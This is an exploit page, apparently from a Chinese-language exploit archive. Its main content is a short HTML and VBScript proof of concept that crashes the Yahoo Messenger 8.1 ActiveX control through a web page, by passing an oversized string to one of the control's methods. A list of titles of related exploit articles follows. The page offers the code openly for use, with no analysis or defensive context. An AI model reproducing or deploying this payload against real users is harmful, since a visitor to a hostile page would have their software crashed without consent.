Yahoo Messenger 8.1 (latest) Remote DoS
Safe for Scripting, Safe for Initialize
<html><body>
<object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object>
<script language=vbscript>
arg1=String(517140, "A")
target.c arg1
</script>
</body></html>
【Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit】相关文章:
★ WarFTP 1.65 (USER) Remote Buffer Overlow Exploit
★ minb 0.1.0 Remote Code Execution Exploit
★ BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
★ Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit
★ NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
★ MojoClassifieds 2.0 Remote Blind SQL Injection Exploit
★ MS Windows (.doc File) Malformed Pointers Denial of Service Exploit
★ Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit